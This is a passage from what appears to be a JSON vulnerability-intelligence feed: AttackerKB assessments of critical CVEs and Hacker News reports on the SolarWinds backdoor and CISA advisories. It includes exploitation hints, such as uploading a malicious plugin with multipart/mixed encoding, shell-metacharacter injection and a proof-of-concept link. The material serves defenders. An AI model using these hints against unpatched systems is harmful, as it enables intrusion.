`multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-13T00:00:00", "type": "attackerkb", "title": "Atlassian Crowd: pdkinstall development plugin incorrectly enabled (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-02-13T00:00:00", "id": "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "href": "https://attackerkb.com/topics/BriLAQlFp1/atlassian-crowd-pdkinstall-development-plugin-incorrectly-enabled-cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:40", "description": "Adobe ColdFusion Update 5 and earlier versions, ColdFusion 11 Update 13 and earlier versions have an exploitable Deserialization of Untrusted Data vulnerability. 
Successful exploitation could lead to arbitrary code execution.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:50pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-19T00:00:00", "type": "attackerkb", "title": "CVE-2018-4939", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4939"], "modified": "2020-09-02T00:00:00", "id": "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799", "href": "https://attackerkb.com/topics/Zt4RJnPnpD/cve-2018-4939", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:39", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol 
traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:52pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2015-11-18T00:00:00", "type": "attackerkb", "title": "CVE-2015-4852", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2020-07-30T00:00:00", "id": "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "href": "https://attackerkb.com/topics/UBKuPZwldv/cve-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:32", "description": "DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. 
This issue has been fixed in Vigor3900/2960/300B v1.5.1.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:10pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-01T00:00:00", "type": "attackerkb", "title": "CVE-2020-8515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-06-05T00:00:00", "id": "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "href": "https://attackerkb.com/topics/OTC0EHe2YO/cve-2020-8515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:33", "description": "The Symantec Messaging Gateway before 10.6.3-267 can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute 
commands remotely on a target machine or in a target process. In this type of occurrence, after gaining access to the system, the attacker may attempt to elevate their privileges.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:08pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-6327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6327"], "modified": "2020-07-23T00:00:00", "id": "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "href": "https://attackerkb.com/topics/b3My5ZDXcf/cve-2017-6327", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-10T23:05:21", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code 
execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s relatively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s relatively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-07-27T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:16", "description": "Exim unauthenticated RCE with reports that it\u2019s been used by [Sandworm since August 2019](<CVE-2019-10149>)\n\n \n**Recent assessments:** \n \n**ericalexanderorg** at May 28, 2020 4:49pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\n**gwillcox-r7** at November 04, 2020 4:03pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-28T00:00:00", "type": "attackerkb", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-28T00:00:00", "id": "AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD", "href": "https://attackerkb.com/topics/jDinrhSIJh/cve-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T07:58:54", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-10-29T00:00:00", "id": 
"AKB:CCDE85CB-574C-401B-9892-9CAFDE0D120B", "href": "https://attackerkb.com/topics/GjH2GsCJaj/cve-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:41", "description": "State-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, 
acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. 
The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. 
\"The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be 
accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:09", "description": "The US Cybersecurity and Infrastructure Security 
Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. 
Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. 
Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. 
Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "Intelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and 